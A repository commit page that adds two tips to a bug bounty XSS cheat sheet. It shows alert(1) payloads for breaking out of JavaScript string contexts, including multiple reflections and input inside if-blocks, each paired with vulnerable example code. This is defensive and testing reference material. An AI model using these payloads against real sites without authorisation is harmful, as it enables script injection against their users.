ch0ic3/AllAboutBugBounty
1
0
Fork 0
mirror of https://github.com/daffainfo/AllAboutBugBounty.git synced 2024-12-19 19:06:13 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

XSS [3]

Browse Source 
Add 2 tips
This commit is contained in:
Muhammad Daffa 2020-09-14 10:02:32 +07:00 committed by GitHub
parent 203e78791a
commit ef653c3092
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 58 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

59
XSS.md
View File

@ -113,6 +113,13 @@
\'alert(1)//
```
* Example source code
```html
<script>
var sitekey = 'REFLECTED_HERE';
</script>
```
* If we input payload '-alert(1)-' it will be like this
```html
<script>
@ -124,9 +131,59 @@ The quotes are escaped by a backslash so we need to bypass them
* After input the payload
```html
<script>
var sitekey = '\'alert(1)//';
var sitekey = '\\'alert(1)//';
</script>
```
9. Use when theres multi reflection in the same line of JS code
```html
/alert(1)//\
/alert(1)}//\
```
* Example source code
```html
<script>
var a = 'REFLECTED_HERE'; var b = 'REFLECTED_HERE';
</script>
```
* After input the payload
```html
<script>
var a = '/alert(1)//\'; var b = '/alert(1)//\';
</script>
```
10. Use when input inside a string delimited value and inside a single logical block like function or conditional (if, else, etc).
```html
'}alert(1);{'
\'}alert(1);{//
```
* Example source code
```html
<script>
var greeting;
var time = 1;
if (time < 10) {
test = 'REFLECTED_HERE';
}
</script>
```
* After input the payload
```html
<script>
var test;
var time = 1;
if (time < 10) {
test = ''}alert(1);{'';
}
</script>
```
> Payload number 2 uses when quote escaped by backslash
*Will be updated again!